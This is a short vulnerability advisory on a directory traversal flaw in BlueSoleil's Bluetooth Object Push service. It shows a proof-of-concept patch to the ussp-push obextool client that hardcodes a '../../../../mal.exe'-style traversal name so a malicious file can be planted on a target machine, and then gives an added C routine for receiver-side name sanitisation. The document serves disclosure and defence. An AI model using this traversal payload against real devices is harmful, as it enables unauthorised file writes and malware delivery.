
BlueSoleil Object Push Service Bluetooth File Upload Directory Traversal Vulnerability

This vulnerability has been demonstrated by modifying the obextool.c source file from ussp-push-0.2 as follows:

@@ -316,7 +316,7 @@
}

filename = argv[1];
- alias = basename(filename);
+ alias = "../../../../../../../../mal.exe";
str2ba(argv[2], &bdaddr);
channel = (argc > 3) ? atoi(argv[3]) : 10;
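
Review bot: the added `alias = "../../../../../../../../mal.exe";` line drops the `basename(filename)` call, so the name sent with the file is no longer the final component of the local path but a fixed string made of parent-directory segments. Since the sender picks this value freely, stripping path components on the client side protects nothing. The receiving Object Push service has to reduce the pushed name to its last component and refuse `.` and `..` before it builds the destination path.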

The modified obextool client may then be used to push a malicious file to a target computer.
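
The receiver-side check that would neutralise the name used above, as an added example (it is not code from this advisory, from BlueSoleil or from ussp-push). The helper name `safe_push_name` is hypothetical, and the sketch assumes the pushed name has already been converted to a NUL-terminated byte string.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: derive a safe local file name from the name a
 * remote OBEX client supplied with a pushed object.
 * Returns 0 and fills `out` on success, -1 if the name must be rejected. */
int safe_push_name(const char *remote, char *out, size_t outlen)
{
    const char *base = remote;
    const char *p;
    size_t len;

    if (remote == NULL || out == NULL || outlen == 0)
        return -1;

    /* Keep only the text after the last '/' or '\\'. Both are treated as
     * separators because the sender, not the receiver, chooses the bytes. */
    for (p = remote; *p != '\0'; p++) {
        if (*p == '/' || *p == '\\')
            base = p + 1;
    }

    len = strlen(base);
    if (len == 0 || len >= outlen)
        return -1;                      /* empty, or would not fit */
    if (strcmp(base, ".") == 0 || strcmp(base, "..") == 0)
        return -1;                      /* directory references */

    for (p = base; *p != '\0'; p++) {
        /* ':' covers drive prefixes and stream suffixes;
         * bytes below 0x20 are control characters. */
        if (*p == ':' || (unsigned char)*p < 0x20)
            return -1;
    }

    memcpy(out, base, len + 1);         /* includes the terminating NUL */
    return 0;
}
```

The returned name should only ever be joined to the fixed inbox directory, and the file created without overwriting an existing one.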







 

Copyright 2008, SecurityFocus